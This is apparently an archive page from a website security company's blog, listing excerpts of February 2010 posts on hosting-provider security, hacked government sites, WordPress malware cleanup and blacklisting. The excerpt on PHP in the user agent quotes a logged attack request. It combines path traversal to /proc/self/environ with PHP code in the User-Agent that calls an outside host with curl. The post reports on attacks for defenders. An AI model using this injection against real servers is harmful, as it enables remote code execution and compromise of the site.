Blog Search
Like Box
Comments
- Dreamhost hacked, mass password-reset issued | ZDNet on DreamHost Security Issue Prompts FTP Password Resets
- Experiences with using GoDaddy, Linux Web Hosting | The (Unorganized) Musings of a Computer Scientist on GoDaddy store your passwords in clear-text and may try to SSH to your VPS without permission
- » Wordpress Security Best Practices & Plugins on Timthumb.php Mass Infection – Aftermath – Part I
- WordPress.org repository will not show plugins older than 2 years on WP-phpmyadmin WordPress plugin – Delete it now
- Wordpress News - The Best WordPress Tips and Tutorials of 2011Wordpress News on Cleaning up an infected website – Part I: WordPress and the Pharma Hack
Tags
alexa apache ask awareness backdoors blacklist blacklisted bluehost dns fox georgia godaddy google guides hacked history honeypot htaccess iis joomla logs malware malware_updates netsol openx oscommerce ossec passwords pharma phishing plugin review sbn scan security spam stats sucuri twitter vbulletin virus vulnerability walmart whois wordpressArchives
- January 2012 (6)
- December 2011 (4)
- November 2011 (4)
- October 2011 (7)
- September 2011 (8)
- August 2011 (16)
- July 2011 (5)
- June 2011 (10)
- May 2011 (10)
- April 2011 (15)
- March 2011 (18)
- February 2011 (13)
- January 2011 (7)
- December 2010 (7)
- November 2010 (9)
- October 2010 (12)
- September 2010 (10)
- August 2010 (7)
- July 2010 (10)
- June 2010 (15)
- May 2010 (19)
- April 2010 (16)
- March 2010 (15)
- February 2010 (8)
- January 2010 (7)
- December 2009 (4)
- November 2009 (1)
- October 2009 (2)
- September 2009 (1)
- August 2009 (6)
- July 2009 (11)
- June 2009 (7)
- May 2009 (4)
- April 2009 (1)
Monthly Archives: February 2010
GoDaddy Security update
My last post GoDaddy store your passwords in clear-text and may try to SSH to your VPS without permission got a lot of traction and it reached the ears of the GoDaddy people! I just got off the phone with … Read more
GoDaddy store your passwords in clear-text and may try to SSH to your VPS without permission
*UPDATE: I just got off the phone with Neil Warner, GoDaddy’s CSO (Chief Security Officer) and he explained the situation to me. Check it out: GoDaddy Security update I have been a GoDaddy user for a while and never had … Read more
.ORG whois reporting DNSSEC status
I was glad to see a handful of whois updates today coming from all the .ORGs that we are monitoring at Sucuri. Basically now at the end of the Whois, it is showing if that domain is using DNSSEC or … Read more
Colombia Government sites hacked (and spreading malware)
You would expect that a security-related web site would be secure, no? What about an official web site from a Government? Should that be safe? What about a government web site about security? Shouldn’t that be ultra super secure? (yes, … Read more
PHP in the user agent (attacking log analysis tools?)
Lately I started to see a few web-based attacks with a php script inside the user agent. Something like this: a.b.229.82 – – [19/Jan/2010:22:43:39 -0700] “GET /index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1″ 200 3820 “-” “< ? echo ‘_rce_’;echo php_uname();echo ‘_rce_’;$ch=curl_init();curl_setopt($ch, CURLOPT_URL, ‘http://websalesusa.com/ken’);curl_setopt($ ch, … Read more
Georgia government sites hacked (and spreading malware)
*UPDATE: A few hours after this post, they removed the malware from justice.gov.ge and other sites. I am glad we had some effect. You know, you would think that after all the attacks that Georgia suffered in 2008 they would … Read more
Removing Malware from a WordPress blog – Case Study
Early this week we were hired to remove some malware from a quite popular web site. The malicious code was there for a little while and the site got blacklisted by google. That’s how the owner noticed it. Everytime someone … Read more
Amazon.com blacklisted by SpamHaus XBL
Update: Spamhaus contact us to let us know that they removed amazon from the blacklist and are investigating the issue. SPAMHAUS has various blacklists and one of them is the XBL: “The Spamhaus Exploits Block List (XBL) is a realtime … Read more
